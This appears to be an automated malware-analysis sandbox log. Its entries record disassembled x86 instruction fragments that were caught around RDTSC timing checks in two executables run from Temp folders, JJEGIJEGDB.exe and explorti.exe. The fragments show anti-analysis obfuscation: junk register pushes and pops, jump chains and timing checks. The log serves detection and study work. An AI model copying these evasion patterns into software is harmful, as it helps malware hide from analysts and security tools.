Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0BAB second address: 53E0C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D8F44CC3h 0x00000009 or cx, 5B2Eh 0x0000000e jmp 00007F34D8F44CC9h 0x00000013 popfd 0x00000014 mov ax, A9B7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007F34D8F44CBAh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movsx ebx, cx 0x0000002b mov esi, 6AE800B5h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0C03 second address: 53E0C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0C15 second address: 53E0C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F34D8F44CBDh 0x00000012 xor esi, 58B8EB76h 0x00000018 jmp 00007F34D8F44CC1h 0x0000001d popfd 0x0000001e pushad 0x0000001f movzx eax, di 0x00000022 mov cx, di 0x00000025 popad 0x00000026 popad 0x00000027 push dword ptr [ebp+08h] 0x0000002a jmp 00007F34D8F44CC5h 0x0000002f push 8F073FA1h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0C73 second address: 53E0C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0C77 second address: 53E0C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0CD2 second address: 53E0CF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov ebx, 12F808CEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d movzx eax, al 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F34D94219E0h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0CF4 second address: 53E0D28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F34D8F44CC1h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F34D8F44CC5h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53906AF second address: 53906E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F34D94219E3h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53906E0 second address: 53906E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53906E6 second address: 5390712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F34D94219DEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F34D94219DDh 0x00000017 pop esi 0x00000018 mov dh, 11h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390712 second address: 53907BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov bx, E218h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F34D8F44CC7h 0x00000013 push FFFFFFFEh 0x00000015 jmp 00007F34D8F44CC6h 0x0000001a push 1A6ECFD3h 0x0000001f pushad 0x00000020 push ebx 0x00000021 pushfd 0x00000022 jmp 00007F34D8F44CBAh 0x00000027 add ax, 66D8h 0x0000002c jmp 00007F34D8F44CBBh 0x00000031 popfd 0x00000032 pop esi 0x00000033 mov edx, 0543F41Ch 0x00000038 popad 0x00000039 xor dword ptr [esp], 6C970FCBh 0x00000040 jmp 00007F34D8F44CBBh 0x00000045 push 2C094DD9h 0x0000004a jmp 00007F34D8F44CBFh 0x0000004f xor dword ptr [esp], 5AF9E3D9h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F34D8F44CC5h 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53907BD second address: 53907EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f jmp 00007F34D94219DEh 0x00000014 nop 0x00000015 pushad 0x00000016 mov edi, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a mov dx, si 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53907EF second address: 5390812 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F34D8F44CC1h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, 1BA5h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390812 second address: 5390843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c jmp 00007F34D94219E6h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 movzx eax, di 0x00000016 push eax 0x00000017 push edx 0x00000018 mov eax, ebx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390843 second address: 539089C instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, di 0x0000000d pushfd 0x0000000e jmp 00007F34D8F44CC9h 0x00000013 xor ch, FFFFFFB6h 0x00000016 jmp 00007F34D8F44CC1h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F34D8F44CC3h 0x00000026 pop esi 0x00000027 mov si, dx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 539089C second address: 53908A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53908A3 second address: 53908BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 jmp 00007F34D8F44CBAh 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53908BB second address: 53908BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53908BF second address: 53908E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 jmp 00007F34D8F44CC2h 0x0000000d xchg eax, edi 0x0000000e pushad 0x0000000f mov eax, 5FB0412Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ebx, eax 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53908E4 second address: 53909C9 instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F34D94219E7h 0x00000010 add ax, 340Eh 0x00000015 jmp 00007F34D94219E9h 0x0000001a popfd 0x0000001b mov ah, 65h 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F34D94219E9h 0x00000026 adc ch, FFFFFFF6h 0x00000029 jmp 00007F34D94219E1h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F34D94219E0h 0x00000035 or cx, 0818h 0x0000003a jmp 00007F34D94219DBh 0x0000003f popfd 0x00000040 popad 0x00000041 mov eax, dword ptr [76FBB370h] 0x00000046 jmp 00007F34D94219E6h 0x0000004b xor dword ptr [ebp-08h], eax 0x0000004e pushad 0x0000004f mov dx, ax 0x00000052 mov di, si 0x00000055 popad 0x00000056 xor eax, ebp 0x00000058 jmp 00007F34D94219E5h 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F34D94219DDh 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53909C9 second address: 5390A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e push edx 0x0000000f push esi 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 push eax 0x00000016 movsx edi, si 0x00000019 pop eax 0x0000001a popad 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F34D8F44CBCh 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A01 second address: 5390A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D94219E1h 0x00000009 add ecx, 69D69F36h 0x0000000f jmp 00007F34D94219E1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr fs:[00000000h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F34D94219E3h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A4E second address: 5390A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+08h] 0x0000000d jmp 00007F34D8F44CC7h 0x00000012 mov eax, dword ptr [esi+10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A7B second address: 5390A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A7F second address: 5390A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A9A second address: 5390B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 push edi 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007F34D94219DDh 0x00000012 jne 00007F354AF50C46h 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c push edi 0x0000001d mov ecx, 75F1CCCBh 0x00000022 pop ecx 0x00000023 popad 0x00000024 mov eax, 00000000h 0x00000029 jmp 00007F34D94219DCh 0x0000002e mov dword ptr [ebp-20h], eax 0x00000031 jmp 00007F34D94219E0h 0x00000036 mov ebx, dword ptr [esi] 0x00000038 pushad 0x00000039 movzx ecx, di 0x0000003c pushfd 0x0000003d jmp 00007F34D94219E3h 0x00000042 or cx, DF4Eh 0x00000047 jmp 00007F34D94219E9h 0x0000004c popfd 0x0000004d popad 0x0000004e mov dword ptr [ebp-24h], ebx 0x00000051 jmp 00007F34D94219DEh 0x00000056 test ebx, ebx 0x00000058 jmp 00007F34D94219E0h 0x0000005d je 00007F354AF50B0Ch 0x00000063 jmp 00007F34D94219E0h 0x00000068 cmp ebx, FFFFFFFFh 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e pushfd 0x0000006f jmp 00007F34D94219DCh 0x00000074 or cx, 6958h 0x00000079 jmp 00007F34D94219DBh 0x0000007e popfd 0x0000007f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390B81 second address: 53906AF instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b jmp 00007F354AA73DA5h 0x00000010 jne 00007F34D8F44CD9h 0x00000012 xor ecx, ecx 0x00000014 mov dword ptr [esi], ecx 0x00000016 mov dword ptr [esi+04h], ecx 0x00000019 mov dword ptr [esi+08h], ecx 0x0000001c mov dword ptr [esi+0Ch], ecx 0x0000001f mov dword ptr [esi+10h], ecx 0x00000022 mov dword ptr [esi+14h], ecx 0x00000025 mov ecx, dword ptr [ebp-10h] 0x00000028 mov dword ptr fs:[00000000h], ecx 0x0000002f pop ecx 0x00000030 pop edi 0x00000031 pop esi 0x00000032 pop ebx 0x00000033 mov esp, ebp 0x00000035 pop ebp 0x00000036 retn 0004h 0x00000039 nop 0x0000003a pop ebp 0x0000003b ret 0x0000003c add esi, 18h 0x0000003f pop ecx 0x00000040 cmp esi, 00A755E8h 0x00000046 jne 00007F34D8F44CA0h 0x00000048 push esi 0x00000049 call 00007F34D8F45523h 0x0000004e push ebp 0x0000004f mov ebp, esp 0x00000051 push dword ptr [ebp+08h] 0x00000054 call 00007F34DD8A8470h 0x00000059 mov edi, edi 0x0000005b pushad 0x0000005c pushad 0x0000005d mov bl, ch 0x0000005f jmp 00007F34D8F44CC7h 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F34D8F44CC6h 0x0000006c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390200 second address: 539020F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 539020F second address: 539025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1FB4611Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F34D8F44CBCh 0x00000011 push eax 0x00000012 jmp 00007F34D8F44CBBh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F34D8F44CC6h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 call 00007F34D8F44CBDh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 1FEE45 second address: 1FE700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F34D94219DCh 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F34D94219DEh 0x00000012 push dword ptr [ebp+122D0019h] 0x00000018 or dword ptr [ebp+122D1870h], ebx 0x0000001e call dword ptr [ebp+122D265Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1870h], esi 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D2154h], ebx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 jmp 00007F34D94219E9h 0x0000003c mov dword ptr [ebp+122D33DDh], eax 0x00000042 pushad 0x00000043 xor dl, FFFFFFB5h 0x00000046 jmp 00007F34D94219DCh 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2154h], edx 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jne 00007F34D94219DCh 0x00000061 lodsw 0x00000063 je 00007F34D94219DDh 0x00000069 jnc 00007F34D94219D7h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 add dword ptr [ebp+122D2154h], eax 0x0000007a adc ch, FFFFFFBCh 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 jmp 00007F34D94219E3h 0x00000089 push eax 0x0000008a jng 00007F34D94219E8h 0x00000090 push eax 0x00000091 push edx 0x00000092 je 00007F34D94219D6h 0x00000098 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B0F9 second address: 36B0FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B639 second address: 36B646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F34D94219D8h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B79F second address: 36B804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F34D8F44CC9h 0x0000000a jnc 00007F34D8F44CB6h 0x00000010 js 00007F34D8F44CB6h 0x00000016 popad 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007F34D8F44CC5h 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007F34D8F44CCBh 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B804 second address: 36B80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B933 second address: 36B93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B93D second address: 36B941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36DF7F second address: 36E00A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F34D8F44CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F34D8F44CBAh 0x00000010 jnp 00007F34D8F44CB6h 0x00000016 popad 0x00000017 popad 0x00000018 add dword ptr [esp], 4985A972h 0x0000001f sbb edi, 127BE68Ch 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D17BBh], edi 0x0000002c cmc 0x0000002d popad 0x0000002e push 00000003h 0x00000030 add dword ptr [ebp+122D1870h], ecx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F34D8F44CB8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007F34D8F44CC2h 0x00000057 push 00000003h 0x00000059 add esi, dword ptr [ebp+122D267Eh] 0x0000005f push 8A6C0093h 0x00000064 push ecx 0x00000065 pushad 0x00000066 jns 00007F34D8F44CB6h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E106 second address: 36E10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E10A second address: 36E10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E10F second address: 36E11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E11F second address: 36E135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F34D8F44CBEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E135 second address: 36E213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F34D94219E0h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F34D94219E0h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007F34D94219E0h 0x0000001f pop eax 0x00000020 call 00007F34D94219E5h 0x00000025 mov esi, dword ptr [ebp+122D360Dh] 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e mov edi, dword ptr [ebp+122D1F3Dh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 mov dword ptr [ebp+122D1BF6h], ebx 0x0000003d pop edx 0x0000003e push 00000003h 0x00000040 jnp 00007F34D94219D9h 0x00000046 movzx edx, cx 0x00000049 call 00007F34D94219D9h 0x0000004e push edi 0x0000004f jmp 00007F34D94219DEh 0x00000054 pop edi 0x00000055 push eax 0x00000056 push esi 0x00000057 jmp 00007F34D94219DDh 0x0000005c pop esi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 jnp 00007F34D94219E2h 0x00000067 jp 00007F34D94219DCh 0x0000006d mov eax, dword ptr [eax] 0x0000006f jmp 00007F34D94219E6h 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 push ebx 0x00000079 push eax 0x0000007a push edx 0x0000007b jp 00007F34D94219D6h 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E213 second address: 36E272 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F34D8F44CB8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007F34D8F44CBDh 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D2383h], ebx 0x0000002e mov dword ptr [ebp+122D22BAh], edi 0x00000034 popad 0x00000035 pop edx 0x00000036 lea ebx, dword ptr [ebp+12442E53h] 0x0000003c or dword ptr [ebp+122D2097h], edi 0x00000042 push eax 0x00000043 push ebx 0x00000044 jc 00007F34D8F44CBCh 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E36C second address: 36E385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E385 second address: 36E38F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F34D8F44CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E38F second address: 36E40E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F34D94219E5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F34D94219D8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1F1Dh], ebx 0x0000002b push 00000003h 0x0000002d mov di, si 0x00000030 push 00000000h 0x00000032 call 00007F34D94219DFh 0x00000037 mov edi, dword ptr [ebp+122D33E9h] 0x0000003d pop esi 0x0000003e mov dword ptr [ebp+122D237Eh], ebx 0x00000044 push 00000003h 0x00000046 mov esi, dword ptr [ebp+122D17C0h] 0x0000004c mov esi, dword ptr [ebp+122D3571h] 0x00000052 push A68CC8A4h 0x00000057 push edx 0x00000058 pushad 0x00000059 jno 00007F34D94219D6h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E40E second address: 36E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 668CC8A4h 0x0000000d mov dword ptr [ebp+122D23ACh], edi 0x00000013 lea ebx, dword ptr [ebp+12442E5Eh] 0x00000019 mov dx, 5C8Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F34D8F44CC1h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E443 second address: 36E45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB38 second address: 35EB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D8F44CB6h 0x0000000a rdtsc
